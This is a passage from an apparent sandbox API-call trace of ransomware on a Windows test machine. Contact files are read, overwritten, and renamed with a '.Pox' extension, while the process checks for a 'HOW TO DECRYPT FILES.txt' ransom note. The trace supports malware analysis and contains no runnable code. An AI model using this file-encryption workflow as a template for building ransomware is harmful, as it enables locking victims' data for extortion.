nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x3c [0038.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.568] GetFileType (hFile=0x26c) returned 0x1 [0038.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.568] GetFileType (hFile=0x26c) returned 0x1 [0038.568] WriteFile (in: hFile=0x26c, lpBuffer=0x2443594*, nNumberOfBytesToWrite=0x10b20, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2443594*, lpNumberOfBytesWritten=0x3ae564*=0x10b20, lpOverlapped=0x0) returned 1 [0038.570] CloseHandle (hObject=0x26c) returned 1 [0038.572] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x3c [0038.572] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.Pox", lpFilePart=0x0) returned 0x40 [0038.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.572] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x292cf840, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x10b20)) returned 1 [0038.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.573] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.pox")) returned 1 [0038.573] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFilePart=0x0) returned 0x3c [0038.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.573] GetFileType (hFile=0x26c) returned 0x1 [0038.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.573] GetFileType (hFile=0x26c) returned 0x1 [0038.573] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x493 [0038.573] ReadFile (in: hFile=0x26c, lpBuffer=0x2454afc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2454afc*, lpNumberOfBytesRead=0x3ae570*=0x493, lpOverlapped=0x0) returned 1 [0038.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFilePart=0x0) returned 0x3c [0038.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.611] GetFileType (hFile=0x26c) returned 0x1 [0038.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.611] GetFileType (hFile=0x26c) returned 0x1 [0038.611] WriteFile (in: hFile=0x26c, lpBuffer=0x24a42d8*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x24a42d8*, lpNumberOfBytesWritten=0x3ae538*=0x4a0, lpOverlapped=0x0) returned 1 [0038.612] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFilePart=0x0) returned 0x3c [0038.612] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.Pox", lpFilePart=0x0) returned 0x40 [0038.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2931bb00, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0038.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.pox")) returned 1 [0038.614] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFilePart=0x0) returned 0x3b [0038.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.615] GetFileType (hFile=0x26c) returned 0x1 [0038.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.615] GetFileType (hFile=0x26c) returned 0x1 [0038.615] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x499 [0038.615] ReadFile (in: hFile=0x26c, lpBuffer=0x24a5a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24a5a6c*, lpNumberOfBytesRead=0x3ae570*=0x499, lpOverlapped=0x0) returned 1 [0038.630] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.630] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFilePart=0x0) returned 0x3b [0038.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.631] GetFileType (hFile=0x26c) returned 0x1 [0038.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.632] GetFileType (hFile=0x26c) returned 0x1 [0038.632] WriteFile (in: hFile=0x26c, lpBuffer=0x24f523c*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x24f523c*, lpNumberOfBytesWritten=0x3ae538*=0x4a0, lpOverlapped=0x0) returned 1 [0038.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFilePart=0x0) returned 0x3b [0038.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.Pox", lpFilePart=0x0) returned 0x3f [0038.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x29367dc0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0038.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.633] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.pox")) returned 1 [0038.635] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFilePart=0x0) returned 0x3c [0038.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.636] GetFileType (hFile=0x26c) returned 0x1 [0038.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.636] GetFileType (hFile=0x26c) returned 0x1 [0038.636] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x496 [0038.636] ReadFile (in: hFile=0x26c, lpBuffer=0x24f69dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24f69dc*, lpNumberOfBytesRead=0x3ae570*=0x496, lpOverlapped=0x0) returned 1 [0038.651] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.651] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.651] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFilePart=0x0) returned 0x3c [0038.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.652] GetFileType (hFile=0x26c) returned 0x1 [0038.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.652] GetFileType (hFile=0x26c) returned 0x1 [0038.652] WriteFile (in: hFile=0x26c, lpBuffer=0x25461b4*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x25461b4*, lpNumberOfBytesWritten=0x3ae538*=0x4a0, lpOverlapped=0x0) returned 1 [0038.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFilePart=0x0) returned 0x3c [0038.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.Pox", lpFilePart=0x0) returned 0x40 [0038.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2938df20, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0038.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.653] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.pox")) returned 1 [0038.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFilePart=0x0) returned 0x3c [0038.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.655] GetFileType (hFile=0x26c) returned 0x1 [0038.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.656] GetFileType (hFile=0x26c) returned 0x1 [0038.656] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x494 [0038.656] ReadFile (in: hFile=0x26c, lpBuffer=0x2547944, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2547944*, lpNumberOfBytesRead=0x3ae570*=0x494, lpOverlapped=0x0) returned 1 [0038.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.671] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFilePart=0x0) returned 0x3c [0038.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.672] GetFileType (hFile=0x26c) returned 0x1 [0038.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.672] GetFileType (hFile=0x26c) returned 0x1 [0038.672] WriteFile (in: hFile=0x26c, lpBuffer=0x259711c*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x259711c*, lpNumberOfBytesWritten=0x3ae538*=0x4a0, lpOverlapped=0x0) returned 1 [0038.673] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFilePart=0x0) returned 0x3c [0038.673] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.Pox", lpFilePart=0x0) returned 0x40 [0038.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x293b4080, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0038.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.673] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.pox")) returned 1 [0038.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.675] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0038.675] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0038.675] FindFirstFileW 